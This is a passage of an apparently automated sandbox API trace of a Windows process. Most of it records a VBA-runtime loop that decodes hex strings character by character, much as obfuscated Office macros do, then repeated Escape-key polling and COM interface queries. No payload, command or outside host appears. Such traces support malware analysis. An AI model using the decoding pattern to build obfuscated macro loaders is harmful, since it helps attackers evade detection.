psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.249] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="e\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.249] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.249] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6de8, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0175.249] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.249] malloc (_Size=0xa0) returned 0x11f50080 [0175.249] free (_Block=0x11f50080) [0175.249] VarI2FromStr (in: strIn="&H97", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.249] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="V", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="V\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.249] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.249] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x991f248, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0175.249] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.249] malloc (_Size=0xa0) returned 0x11f50080 [0175.250] free (_Block=0x11f50080) [0175.250] VarI2FromStr (in: strIn="&Hb4", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.250] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.250] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.250] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x9653bf8, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0175.250] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.250] malloc (_Size=0xa0) returned 0x11f50080 [0175.250] free (_Block=0x11f50080) [0175.250] VarI2FromStr (in: strIn="&Hb3", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.250] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="o", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="o\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.250] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.250] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6e18, cchWideChar=1 | out: lpWideCharStr="D") returned 1 [0175.250] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.250] malloc (_Size=0xa0) returned 0x11f50080 [0175.250] free (_Block=0x11f50080) [0175.250] VarI2FromStr (in: strIn="&Hb6", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.251] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="O", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.251] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.251] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6de8, cchWideChar=1 | out: lpWideCharStr="g") returned 1 [0175.251] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.251] malloc (_Size=0xa0) returned 0x11f50080 [0175.251] free (_Block=0x11f50080) [0175.251] VarI2FromStr (in: strIn="&Hb1", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.251] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="p", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="p\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.251] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.251] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x7efed68, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0175.251] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.251] malloc (_Size=0xa0) returned 0x11f50080 [0175.251] free (_Block=0x11f50080) [0175.251] VarI2FromStr (in: strIn="&Hae", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.251] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="m", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="m\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.251] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.251] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6db8, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0175.251] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.252] malloc (_Size=0xa0) returned 0x11f50080 [0175.252] free (_Block=0x11f50080) [0175.252] VarI2FromStr (in: strIn="&Hae", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.252] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="e\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.252] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.252] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6e18, cchWideChar=1 | out: lpWideCharStr="I") returned 1 [0175.252] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.252] malloc (_Size=0xa0) returned 0x11f50080 [0175.252] free (_Block=0x11f50080) [0175.252] VarI2FromStr (in: strIn="&Hb6", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.252] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="N", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.252] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.252] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x96539b8, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0175.252] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x1 [0175.252] malloc (_Size=0xa0) returned 0x11f50080 [0175.252] free (_Block=0x11f50080) [0175.253] VarI2FromStr (in: strIn="&Hb4", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.253] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.253] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.253] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x991f248, cchWideChar=1 | out: lpWideCharStr="C") returned 1 [0175.253] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.253] malloc (_Size=0xa0) returned 0x11f50080 [0175.253] free (_Block=0x11f50080) [0175.253] VarI2FromStr (in: strIn="&He5", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.253] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="n\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.253] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.253] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6e18, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0175.253] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.253] malloc (_Size=0xa0) returned 0x11f50080 [0175.253] free (_Block=0x11f50080) [0175.253] VarI2FromStr (in: strIn="&H9f", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.253] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Z", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Z\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.253] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.254] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x9653bf8, cchWideChar=1 | out: lpWideCharStr="E") returned 1 [0175.254] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.254] malloc (_Size=0xa0) returned 0x11f50080 [0175.254] free (_Block=0x11f50080) [0175.254] VarI2FromStr (in: strIn="&Hb4", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.254] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="e\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.254] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.254] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6de8, cchWideChar=1 | out: lpWideCharStr="O") returned 1 [0175.254] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.254] malloc (_Size=0xa0) returned 0x11f50080 [0175.254] free (_Block=0x11f50080) [0175.254] VarI2FromStr (in: strIn="&H99", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.254] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="V", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="V\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.254] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.254] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x991f248, cchWideChar=1 | out: lpWideCharStr="C") returned 1 [0175.254] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.255] malloc (_Size=0xa0) returned 0x11f50080 [0175.255] free (_Block=0x11f50080) [0175.255] VarI2FromStr (in: strIn="&Hda", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.255] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.255] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.255] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x7efed68, cchWideChar=1 | out: lpWideCharStr="g") returned 1 [0175.255] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.255] malloc (_Size=0xa0) returned 0x11f50080 [0175.255] free (_Block=0x11f50080) [0175.255] VarI2FromStr (in: strIn="&Hb1", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.255] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="o", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="o\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.255] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.255] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6db8, cchWideChar=1 | out: lpWideCharStr="B") returned 1 [0175.255] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.255] malloc (_Size=0xa0) returned 0x11f50080 [0175.256] free (_Block=0x11f50080) [0175.256] VarI2FromStr (in: strIn="&Hc0", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.256] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="O", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.256] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.256] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6de8, cchWideChar=1 | out: lpWideCharStr="q") returned 1 [0175.256] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.256] malloc (_Size=0xa0) returned 0x11f50080 [0175.256] free (_Block=0x11f50080) [0175.256] VarI2FromStr (in: strIn="&Hb1", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.256] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="p", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="p\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.256] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.256] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x96539b8, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0175.256] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.256] malloc (_Size=0xa0) returned 0x11f50080 [0175.256] free (_Block=0x11f50080) [0175.256] VarI2FromStr (in: strIn="&Hd4", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.257] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="m", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="m\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.257] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.257] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6e18, cchWideChar=1 | out: lpWideCharStr="g") returned 1 [0175.257] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.257] malloc (_Size=0xa0) returned 0x11f50080 [0175.257] free (_Block=0x11f50080) [0175.257] VarI2FromStr (in: strIn="&Ha6", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.257] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="e\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.257] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.257] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6db8, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0175.257] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.289] GetAsyncKeyState (vKey=27) returned 0 [0175.480] GetAsyncKeyState (vKey=27) returned 0 [0175.683] GetAsyncKeyState (vKey=27) returned 0 [0175.886] GetAsyncKeyState (vKey=27) returned 0 [0176.089] GetAsyncKeyState (vKey=27) returned 0 [0176.323] GetAsyncKeyState (vKey=27) returned 0 [0176.528] GetAsyncKeyState (vKey=27) returned 0 [0176.729] GetAsyncKeyState (vKey=27) returned 0 [0176.931] GetAsyncKeyState (vKey=27) returned 0 [0177.134] GetAsyncKeyState (vKey=27) returned 0 [0177.352] GetAsyncKeyState (vKey=27) returned 0 [0177.555] GetAsyncKeyState (vKey=27) returned 0 [0177.758] GetAsyncKeyState (vKey=27) returned 0 [0177.962] GetAsyncKeyState (vKey=27) returned 0 [0178.163] GetAsyncKeyState (vKey=27) returned 0 [0178.368] GetAsyncKeyState (vKey=27) returned 0 [0178.569] GetAsyncKeyState (vKey=27) returned 0 [0178.772] GetAsyncKeyState (vKey=27) returned 0 [0178.975] GetAsyncKeyState (vKey=27) returned 0 [0179.177] GetAsyncKeyState (vKey=27) returned 0 [0179.380] GetAsyncKeyState (vKey=27) returned 0 [0179.584] GetAsyncKeyState (vKey=27) returned 0 [0179.786] GetAsyncKeyState (vKey=27) returned 0 [0179.991] GetAsyncKeyState (vKey=27) returned 0 [0180.216] GetAsyncKeyState (vKey=27) returned 0 [0180.410] GetAsyncKeyState (vKey=27) returned 0 [0180.628] GetAsyncKeyState (vKey=27) returned 0 [0180.832] GetAsyncKeyState (vKey=27) returned 0 [0181.035] GetAsyncKeyState (vKey=27) returned 0 [0181.237] GetAsyncKeyState (vKey=27) returned 0 [0181.489] GetAsyncKeyState (vKey=27) returned 0 [0181.705] GetAsyncKeyState (vKey=27) returned 0 [0181.908] GetAsyncKeyState (vKey=27) returned 0 [0182.110] GetAsyncKeyState (vKey=27) returned 0 [0182.345] GetAsyncKeyState (vKey=27) returned 0 [0182.548] GetAsyncKeyState (vKey=27) returned 0 [0182.771] GetAsyncKeyState (vKey=27) returned 0 [0182.953] GetAsyncKeyState (vKey=27) returned 0 [0183.156] GetAsyncKeyState (vKey=27) returned 0 [0183.358] GetAsyncKeyState (vKey=27) returned 0 [0183.577] GetAsyncKeyState (vKey=27) returned 0 [0183.780] GetAsyncKeyState (vKey=27) returned 0 [0183.984] GetAsyncKeyState (vKey=27) returned 0 [0184.185] GetAsyncKeyState (vKey=27) returned 0 [0184.388] GetAsyncKeyState (vKey=27) returned 0 [0184.606] GetAsyncKeyState (vKey=27) returned 0 [0184.809] GetAsyncKeyState (vKey=27) returned 0 [0185.013] GetAsyncKeyState (vKey=27) returned 0 [0185.227] GetAsyncKeyState (vKey=27) returned 0 [0185.418] GetAsyncKeyState (vKey=27) returned 0 [0185.620] GetAsyncKeyState (vKey=27) returned 0 [0185.854] GetAsyncKeyState (vKey=27) returned 0 [0186.026] GetAsyncKeyState (vKey=27) returned 0 [0186.229] GetAsyncKeyState (vKey=27) returned 0 [0186.432] GetAsyncKeyState (vKey=27) returned 0 [0186.650] GetAsyncKeyState (vKey=27) returned 0 [0186.853] GetAsyncKeyState (vKey=27) returned 0 [0187.056] GetAsyncKeyState (vKey=27) returned 0 [0187.260] GetAsyncKeyState (vKey=27) returned 0 [0187.462] GetAsyncKeyState (vKey=27) returned 0 [0187.680] GetAsyncKeyState (vKey=27) returned 0 [0187.890] GetAsyncKeyState (vKey=27) returned 0 [0188.085] GetAsyncKeyState (vKey=27) returned 0 [0188.288] GetAsyncKeyState (vKey=27) returned 0 [0188.491] GetAsyncKeyState (vKey=27) returned 0 [0188.694] GetAsyncKeyState (vKey=27) returned 0 [0188.896] GetAsyncKeyState (vKey=27) returned 0 [0189.099] GetAsyncKeyState (vKey=27) returned 0 [0189.302] GetAsyncKeyState (vKey=27) returned 0 [0189.505] GetAsyncKeyState (vKey=27) returned 0 [0189.708] GetAsyncKeyState (vKey=27) returned 0 [0189.911] GetAsyncKeyState (vKey=27) returned 0 [0190.113] GetAsyncKeyState (vKey=27) returned 0 [0190.317] GetAsyncKeyState (vKey=27) returned 0 [0190.519] GetAsyncKeyState (vKey=27) returned 0 [0190.737] GetAsyncKeyState (vKey=27) returned 0 [0190.942] GetAsyncKeyState (vKey=27) returned 0 [0191.144] GetAsyncKeyState (vKey=27) returned 0 [0191.345] GetAsyncKeyState (vKey=27) returned 0 [0191.549] GetAsyncKeyState (vKey=27) returned 0 [0191.751] GetAsyncKeyState (vKey=27) returned 0 [0191.954] GetAsyncKeyState (vKey=27) returned 0 [0192.157] GetAsyncKeyState (vKey=27) returned 0 [0192.360] GetAsyncKeyState (vKey=27) returned 0 [0192.563] GetAsyncKeyState (vKey=27) returned 0 [0192.765] GetAsyncKeyState (vKey=27) returned 0 [0192.968] GetAsyncKeyState (vKey=27) returned 0 [0193.171] GetAsyncKeyState (vKey=27) returned 0 [0193.373] GetAsyncKeyState (vKey=27) returned 0 [0193.590] GetAsyncKeyState (vKey=27) returned 0 [0193.779] GetAsyncKeyState (vKey=27) returned 0 [0193.984] GetAsyncKeyState (vKey=27) returned 0 [0194.185] GetAsyncKeyState (vKey=27) returned 0 [0194.387] GetAsyncKeyState (vKey=27) returned 0 [0194.590] GetAsyncKeyState (vKey=27) returned 0 [0194.796] GetAsyncKeyState (vKey=27) returned 0 [0195.001] GetAsyncKeyState (vKey=27) returned 0 [0195.199] GetAsyncKeyState (vKey=27) returned 0 [0195.406] GetAsyncKeyState (vKey=27) returned 0 [0195.605] GetAsyncKeyState (vKey=27) returned 0 [0195.886] GetAsyncKeyState (vKey=27) returned 0 [0196.088] GetAsyncKeyState (vKey=27) returned 0 [0196.291] GetAsyncKeyState (vKey=27) returned 0 [0196.494] GetAsyncKeyState (vKey=27) returned 0 [0196.696] GetAsyncKeyState (vKey=27) returned 0 [0196.904] GetAsyncKeyState (vKey=27) returned 0 [0197.102] GetAsyncKeyState (vKey=27) returned 0 [0197.305] GetAsyncKeyState (vKey=27) returned 0 [0197.508] GetAsyncKeyState (vKey=27) returned 0 [0197.713] GetAsyncKeyState (vKey=27) returned 0 [0197.929] GetAsyncKeyState (vKey=27) returned 0 [0198.132] GetAsyncKeyState (vKey=27) returned 0 [0198.334] GetAsyncKeyState (vKey=27) returned 0 [0198.537] GetAsyncKeyState (vKey=27) returned 0 [0198.744] GetAsyncKeyState (vKey=27) returned 0 [0198.943] GetAsyncKeyState (vKey=27) returned 0 [0199.145] GetAsyncKeyState (vKey=27) returned 0 [0199.348] GetAsyncKeyState (vKey=27) returned 0 [0199.551] GetAsyncKeyState (vKey=27) returned 0 [0199.754] GetAsyncKeyState (vKey=27) returned 0 [0199.957] GetAsyncKeyState (vKey=27) returned 0 [0200.160] GetAsyncKeyState (vKey=27) returned 0 [0200.362] GetAsyncKeyState (vKey=27) returned 0 [0200.565] GetAsyncKeyState (vKey=27) returned 0 [0200.768] GetAsyncKeyState (vKey=27) returned 0 [0200.999] GetAsyncKeyState (vKey=27) returned 0 [0201.189] GetAsyncKeyState (vKey=27) returned 0 [0201.393] GetAsyncKeyState (vKey=27) returned 0 [0201.598] GetAsyncKeyState (vKey=27) returned 0 [0201.797] GetAsyncKeyState (vKey=27) returned 0 [0202.000] GetAsyncKeyState (vKey=27) returned 0 [0202.204] GetAsyncKeyState (vKey=27) returned 0 [0202.407] GetAsyncKeyState (vKey=27) returned 0 [0202.609] GetAsyncKeyState (vKey=27) returned 0 [0202.962] GetAsyncKeyState (vKey=27) returned 0 [0202.964] _mbscpy_s (in: _Dst=0x1dc9f0, _DstSizeInBytes=0x2, _Src=0x5732bb2 | out: _Dst=0x1dc9f0) returned 0x0 [0202.965] IUnknown:AddRef (This=0xa121698) returned 0x8 [0202.965] IUnknown:Release (This=0xa121698) returned 0x7 [0202.965] IUnknown:QueryInterface (in: This=0xa121698, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc828 | out: ppvObject=0x1dc828*=0x0) returned 0x80004002 [0202.965] IUnknown:QueryInterface (in: This=0xa121698, riid=0x7fee51d0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), 